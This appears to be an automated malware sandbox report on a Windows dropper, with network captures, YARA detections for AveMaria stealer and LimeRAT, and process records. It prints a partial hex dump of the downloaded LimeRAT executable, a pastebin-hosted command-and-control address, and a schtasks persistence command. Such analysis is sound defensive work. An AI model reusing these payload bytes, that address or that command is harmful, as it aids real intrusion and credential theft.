                                                                            Mar 21, 2022 14:45:54.851425886 CET5613653192.168.11.201.1.1.1
                                                                            Mar 21, 2022 14:45:54.860440969 CET53561361.1.1.1192.168.11.20
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Mar 21, 2022 14:45:54.851425886 CET192.168.11.201.1.1.10x1475Standard query (0)pastebin.comA (IP address)IN (0x0001)
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Mar 21, 2022 14:45:54.860440969 CET1.1.1.1192.168.11.200x1475No error (0)pastebin.com104.23.98.190A (IP address)IN (0x0001)
                                                                            Mar 21, 2022 14:45:54.860440969 CET1.1.1.1192.168.11.200x1475No error (0)pastebin.com104.23.99.190A (IP address)IN (0x0001)
                                                                            • pastebin.com
                                                                            • 172.111.242.20
                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.11.2049764104.23.98.190443C:\Users\user\AppData\Local\Temp\chrome.exe
                                                                            TimestampkBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.11.2049762172.111.242.2080C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Mar 21, 2022 14:44:48.856550932 CET5746OUTGET /Chrome.exe HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: 172.111.242.20
                                                                            Connection: Keep-Alive
                                                                            Mar 21, 2022 14:44:48.910203934 CET5747INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Mar 2022 13:44:48 GMT
                                                                            Server: Apache/2.2.8 (Win32)
                                                                            Last-Modified: Thu, 10 Mar 2022 10:08:40 GMT
                                                                            ETag: "300000003618c-7200-5d9da65f94fe9"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 29184
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-msdownload
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 20 ce 29 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 6e 00 00 00 02 00 00 00 00 00 00 6e 8d 00 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 8d 00 00 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 6d 00 00 00 20 00 00 00 6e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 8d 00 00 00 00 00 00 48 00 00 00 02 00 05 00 60 47 00 00 bc 45 00 00 03 00 00 00 56 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 2e 7e 01 00 00 04 6f 0a 00 00 0a 2a 2e 7e 02 00 00 04 6f 0b 00 00 0a 2a 2e 7e 03 00 00 04 6f 0c 00 00 0a 2a 2e 7e 04 00 00 04 6f 0d 00 00 0a 2a 36 02 03 28 11 00 00 0a 28 12 00 00 0a 2a 1e 02 28 13 00 00 0a 2a 2e d0 05 00 00 02 28 14 00 00 0a 2a 1e 02 28 15 00 00 0a 2a 13 30 01 00 14 00 00 00 01 00 00 11 02 8c 05 00 00 1b 2d 08 28 01 00 00 2b 0a 2b 02 02 0a 06 2a 22 03 fe 15 05 00 00 1b 2a 1e 02 28 17 00 00 0a 2a 72 7e 1b 00 00 0a 8c 07 00 00 1b 2d 0a 28 02 00 00 2b 80 1b 00 00 0a 7e 1b 00 00 0a 2a 1e 02 1b 30 04 00 a0 00 00 00 02 00 00 11 28 14 00 00 06 2d 57 28 19 00 00 06 6f 15 00 00 0a 6f 1d 00 00 0a 72 01 00 00 70 28 1d 00 00 0a 6f 1e 00 00 0a 2d 37 72 07 00 00 70 28 12 00 00 06 2d 2b 28 1f 00 00 0a 2d 24 28 20 00 00 0a 2d 1d 72 1f 00 00 70 28 21 00 00 0a 72 2d 00 00 70 28 22 00 00 0a 28 23 00 00 0a 2d 02 de 41 72 49 00 00 70 28 24 00 00 0a 28 28 00 00 06 72 9b 00 00 70 28 25 00 00 0a 72 9b 00 00 70 28 26 00 00 0a 16 16 15 28 27 00 00 0a 26 28 28 00 00 0a de 0e 25 28 29 00 00 0a 0a 28 2a 00 00 0a de 00 2a 01 10 00 00 00 00 00 00 91 91 00 0e 14 00 00 01 1b 30 03 00 e3 00 00 00 03 00 00 11 72 9f 00
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL )bnn @ @O H.texttm n `.relocp@BPH`GEV(*(*ssss*.~o*.~o*.~o*.~o*6((*(*.(*(*0-(++*"*(*r~-(+~*0(-W(oorp(o-7rp(-+(-$( -rp(!r-p("(#-ArIp($((rp(%rp(&('&((%()(**0r
                                                                            Mar 21, 2022 14:44:48.910264969 CET5748INData Raw: 00 70 73 2b 00 00 0a 0b 07 6f 2c 00 00 0a 0c 08 6f 2d 00 00 0a 0d 38 81 00 00 00 09 6f 2e 00 00 0a 13 04 11 04 72 e5 00 00 70 6f 2f 00 00 0a 6f 15 00 00 0a 6f 1d 00 00 0a 13 05 11 05 72 ff 00 00 70 16 28 30 00 00 0a 2d 22 11 04 72 2b 01 00 70 6f
                                                                            Data Ascii: ps+o,o-8o.rpo/oorp(0-"r+po/oo1r7po-,rGpo-r+po/orUp(0-Bo2:t,o3,o3,o3%()(**4
                                                                            Mar 21, 2022 14:44:48.910312891 CET5750INData Raw: 38 00 14 14 00 00 01 1b 30 03 00 76 00 00 00 04 00 00 11 7e 10 00 00 04 2c 51 72 2b 03 00 70 28 2a 00 00 06 14 16 28 30 00 00 0a 2d 1d 72 2b 03 00 70 72 33 03 00 70 28 2b 00 00 06 26 72 2b 03 00 70 28 2a 00 00 06 0a de 3d 72 2b 03 00 70 28 2a 00
                                                                            Data Ascii: 80v~,Qr+p(*(0-r+pr3p(+&r+p(*=r+p(*0%()rop(*~-~-rGp+r3p*=D0rYp(Hr_p(<rpsIo,o-+o.t)rpo/o
                                                                            Mar 21, 2022 14:44:48.910381079 CET5751INData Raw: 0b 16 8c 39 00 00 01 0a 28 2a 00 00 0a de 00 06 2a 01 10 00 00 00 00 00 00 29 29 00 15 14 00 00 01 13 30 07 00 83 00 00 00 0e 00 00 11 73 5d 00 00 0a 73 5e 00 00 0a 0a 73 5e 00 00 0a 0b 02 28 28 00 00 06 03 15 16 28 5f 00 00 0a 0c 06 02 16 08 16
                                                                            Data Ascii: 9(**))0s]s^s^(((_o`oao`o`io`o`oa%oboc%obocododoe*zof3(:*of3(:*0G,`s^sg%
                                                                            Mar 21, 2022 14:44:48.910428047 CET5752INData Raw: 28 30 00 00 0a 39 cd 01 00 00 07 72 28 07 00 70 16 28 30 00 00 0a 39 e7 01 00 00 38 fc 01 00 00 17 80 27 00 00 04 72 32 07 00 70 28 44 00 00 06 38 e7 01 00 00 17 80 26 00 00 04 38 dc 01 00 00 00 28 7e 00 00 0a 6f 7f 00 00 0a 0c 28 7e 00 00 0a 6f
                                                                            Data Ascii: (09r(p(098'r2p(D8&8(~o(~o(( s(oos os^ s( sooso(
                                                                            Mar 21, 2022 14:44:48.911612988 CET5754INData Raw: 0c 7e 1e 00 00 04 6f 9d 00 00 0a 2c 0c 7e 1e 00 00 04 6f 9e 00 00 0a 2d 05 dd 4f 01 00 00 7e 1e 00 00 04 6f 9d 00 00 0a 16 3e 2c 01 00 00 7e 1e 00 00 04 6f 9d 00 00 0a 17 da 17 d6 8d 2f 00 00 01 0a 7e 1e 00 00 04 6f 9b 00 00 0a 06 16 06 8e 69 16
                                                                            Data Ascii: ~o,~o-O~o>,~o/~oio&~"ioa~"ob((~o9~"ob~(,~+,~++~*Hss%+st%X((ov~"ods^
                                                                            Mar 21, 2022 14:44:48.911674976 CET5755INData Raw: 00 00 00 00 00 00 00 00 00 00 00 57 00 00 00 8b 02 00 00 e2 02 00 00 1a 00 00 00 14 00 00 01 1b 30 05 00 8f 00 00 00 16 00 00 11 73 5e 00 00 0a 0a 06 02 16 02 8e 69 6f 61 00 00 0a 06 7e 1c 00 00 04 28 27 00 00 06 16 7e 1c 00 00 04 6f 60 00 00 0a
                                                                            Data Ascii: W0s^ioa~('~o`oa~(~oo&~oobojo&(od%()!(**83ktzZ(K([('(C*0
                                                                            Mar 21, 2022 14:44:48.911722898 CET5757INData Raw: cd 00 00 0a 17 6a da b7 17 d6 8d 2f 00 00 01 0b 06 6f cd 00 00 0a b7 0c 16 0d 2b 19 06 07 09 08 6f ce 00 00 0a 13 04 11 04 2c 0e 09 11 04 d6 0d 08 11 04 da 0c 08 16 30 e3 07 8e 69 0c 02 18 18 73 cc 00 00 0a 13 05 11 05 07 16 08 6f cf 00 00 0a 11
                                                                            Data Ascii: j/o+o,0isooo,o3oo,o3~([(0()(**(Vp}0^,)rp~(4rp(4
                                                                            Mar 21, 2022 14:44:48.913517952 CET5758INData Raw: 5c 00 3c 14 00 00 01 1b 30 03 00 99 00 00 00 11 00 00 11 72 51 09 00 70 28 2a 00 00 06 14 16 28 30 00 00 0a 2d 29 7e 21 00 00 04 2c 16 20 f8 2a 00 00 28 77 00 00 0a 72 5b 09 00 70 28 44 00 00 06 2b 2a 20 88 13 00 00 28 77 00 00 0a 2b d7 72 51 09
                                                                            Data Ascii: \<0rQp(*(0-)~!, *(wr[p(D+* (w+rQp(*($(.(><%()rTp~-(}rgp(}o(}([(D(**\\<. (\*BSJBv4.0.30319lH
                                                                            Mar 21, 2022 14:44:48.914117098 CET5760INData Raw: 16 1d 00 1c 00 3f 00 05 21 00 00 0e 01 00 00 1d 00 2a 00 46 00 01 00 00 00 28 14 c4 0f 1d 00 2d 00 4a 00 01 00 00 00 2e 1f 16 18 1d 00 2d 00 4d 00 01 00 00 00 db 1e e1 14 1d 00 2d 00 4f 00 01 00 10 00 c5 13 2d 17 1d 00 2d 00 54 00 01 00 00 00 6d
                                                                            Data Ascii: ?!*F(-J.-M-O--Tm .[.^1J1R1Z1bUA)o4KIq7><E<| <<kA
                                                                            Mar 21, 2022 14:44:48.961494923 CET5761INData Raw: 3c 00 00 00 00 16 00 46 17 f8 03 20 00 10 3d 00 00 00 00 16 00 86 19 86 00 21 00 0d 21 00 00 00 00 06 18 b3 0a 13 00 21 00 b0 3d 00 00 00 00 11 18 b9 0a 86 00 21 00 bc 3d 00 00 00 00 03 08 21 00 1f 04 21 00 c9 3d 00 00 00 00 03 08 5b 00 1f 04 22
                                                                            Data Ascii: <F =!!!=!=!!=["!#=9#h>9$!%?'%!%?H%@s%@A%(B8 p&B'!


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.11.2049764104.23.98.190443C:\Users\user\AppData\Local\Temp\chrome.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            2022-03-21 13:45:56 UTC0OUTGET /raw/03PEm7js HTTP/1.1
                                                                            Host: pastebin.com
                                                                            Connection: Keep-Alive
                                                                            2022-03-21 13:45:56 UTC0INHTTP/1.1 200 OK
                                                                            Date: Mon, 21 Mar 2022 13:45:56 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-frame-options: DENY
                                                                            x-content-type-options: nosniff
                                                                            x-xss-protection: 1;mode=block
                                                                            cache-control: public, max-age=1801
                                                                            CF-Cache-Status: HIT
                                                                            Age: 761
                                                                            Last-Modified: Mon, 21 Mar 2022 13:33:15 GMT
                                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                            Server: cloudflare
                                                                            CF-RAY: 6ef7217e4ce95b32-FRA
                                                                            2022-03-21 13:45:56 UTC0INData Raw: 31 33 0d 0a 31 37 32 2e 31 31 31 2e 32 34 32 2e 32 30 3a 32 30 33 33 0d 0a
                                                                            Data Ascii: 13172.111.242.20:2033
                                                                            2022-03-21 13:45:56 UTC0INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Target ID:1
                                                                            Start time:14:42:24
                                                                            Start date:21/03/2022
                                                                            Path:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe"
                                                                            Imagebase:0xbd0000
                                                                            File size:1320960 bytes
                                                                            MD5 hash:81BA3D2DE48272D692C4E6604E6B1DB9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000001.00000002.83503482474.00000000014EF000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000001.00000002.83503482474.00000000014EF000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Target ID:12
                                                                            Start time:14:44:42
                                                                            Start date:21/03/2022
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\System32\cmd.exe
                                                                            Imagebase:0xc80000
                                                                            File size:236544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            Target ID:13
                                                                            Start time:14:44:42
                                                                            Start date:21/03/2022
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff70ba20000
                                                                            File size:875008 bytes
                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            Target ID:15
                                                                            Start time:14:44:49
                                                                            Start date:21/03/2022
                                                                            Path:C:\Users\user\AppData\Roaming\wtqsCpda..exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\wtqsCpda..exe"
                                                                            Imagebase:0x540000
                                                                            File size:29184 bytes
                                                                            MD5 hash:3D7801D573CAB12F3093C219EBFE495C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 0000000F.00000000.79892233843.0000000000542000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 0000000F.00000000.79893250831.0000000000542000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 0000000F.00000000.79893776213.0000000000542000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, Author: Joe Security
                                                                            • Rule: MALWARE_Win_LimeRAT, Description: LimeRAT payload, Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, Author: ditekSHen
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 93%, ReversingLabs
                                                                            Reputation:low

                                                                            Target ID:16
                                                                            Start time:14:45:07
                                                                            Start date:21/03/2022
                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\user\AppData\Local\Temp\chrome.exe'"
                                                                            Imagebase:0x450000
                                                                            File size:187904 bytes
                                                                            MD5 hash:478BEAEC1C3A9417272BC8964ADD1CEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000010.00000002.80087663971.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000010.00000002.80088120152.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Target ID:17
                                                                            Start time:14:45:08
                                                                            Start date:21/03/2022
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff70ba20000
                                                                            File size:875008 bytes
                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            Target ID:18
                                                                            Start time:14:45:09
                                                                            Start date:21/03/2022
                                                                            Path:C:\Users\user\AppData\Local\Temp\chrome.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\chrome.exe
                                                                            Imagebase:0x760000
                                                                            File size:29184 bytes
                                                                            MD5 hash:3D7801D573CAB12F3093C219EBFE495C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000012.00000002.83499752484.0000000000762000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                            • Rule: HKTL_NET_GUID_Lime_RAT, Description: Detects VB.NET red/black-team tools via typelibguid, Source: 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                            • Rule: HKTL_NET_GUID_Lime_RAT, Description: Detects VB.NET red/black-team tools via typelibguid, Source: 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: C:\Users\user\AppData\Local\Temp\chrome.exe, Author: Joe Security
                                                                            • Rule: MALWARE_Win_LimeRAT, Description: LimeRAT payload, Source: C:\Users\user\AppData\Local\Temp\chrome.exe, Author: ditekSHen
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 93%, ReversingLabs
                                                                            Reputation:low

                                                                            Target ID:19
                                                                            Start time:14:45:24
                                                                            Start date:21/03/2022
                                                                            Path:C:\Users\user\AppData\Local\Temp\chrome.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\chrome.exe"
                                                                            Imagebase:0xa20000
                                                                            File size:29184 bytes
                                                                            MD5 hash:3D7801D573CAB12F3093C219EBFE495C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000013.00000000.80247515540.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000013.00000002.80404784517.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000013.00000000.80246486829.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000013.00000000.80246995488.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:1.8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:1%
                                                                              Total number of Nodes:1111
                                                                              Total number of Limit Nodes:26
                                                                              execution_graph 10719 bd943f 10720 bdb8fc 66 API calls 10719->10720 10721 bd9447 10720->10721 10729 bdc914 10721->10729 10723 bd944c 10739 bdc9bf 10723->10739 10726 bd9476 10727 bd8b82 14 API calls 10726->10727 10728 bd9481 10727->10728 10730 bdc920 10729->10730 10743 bd9d97 EnterCriticalSection 10730->10743 10732 bdc997 10757 bdc9b6 10732->10757 10734 bdc92b 10734->10732 10736 bdc96b DeleteCriticalSection 10734->10736 10744 bde56b 10734->10744 10738 bd8b82 14 API calls 10736->10738 10738->10734 10740 bdc9d6 10739->10740 10742 bd945b DeleteCriticalSection 10739->10742 10741 bd8b82 14 API calls 10740->10741 10740->10742 10741->10742 10742->10723 10742->10726 10743->10734 10745 bde577 10744->10745 10746 bde596 10745->10746 10747 bde581 10745->10747 10749 bde591 10746->10749 10760 bd948b EnterCriticalSection 10746->10760 10748 bd75d4 14 API calls 10747->10748 10751 bde586 10748->10751 10749->10734 10753 bd748c 25 API calls 10751->10753 10752 bde5b3 10761 bde4f4 10752->10761 10753->10749 10755 bde5be 10777 bde5e5 10755->10777 10836 bd9ddf LeaveCriticalSection 10757->10836 10759 bdc9a3 10759->10723 10760->10752 10762 bde501 10761->10762 10764 bde516 10761->10764 10763 bd75d4 14 API calls 10762->10763 10765 bde506 10763->10765 10766 bdb84f 62 API calls 10764->10766 10770 bde511 10764->10770 10767 bd748c 25 API calls 10765->10767 10768 bde52b 10766->10768 10767->10770 10769 bdc9bf 14 API calls 10768->10769 10771 bde533 10769->10771 10770->10755 10772 bd9350 25 API calls 10771->10772 10773 bde539 10772->10773 10780 bdf268 10773->10780 10776 bd8b82 14 API calls 10776->10770 10835 bd949f LeaveCriticalSection 10777->10835 10779 bde5ed 10779->10749 10781 bdf279 10780->10781 10783 bdf28e 10780->10783 10784 bd75c1 14 API calls 10781->10784 10782 bdf2d7 10785 bd75c1 14 API calls 10782->10785 10783->10782 10788 bdf2b5 10783->10788 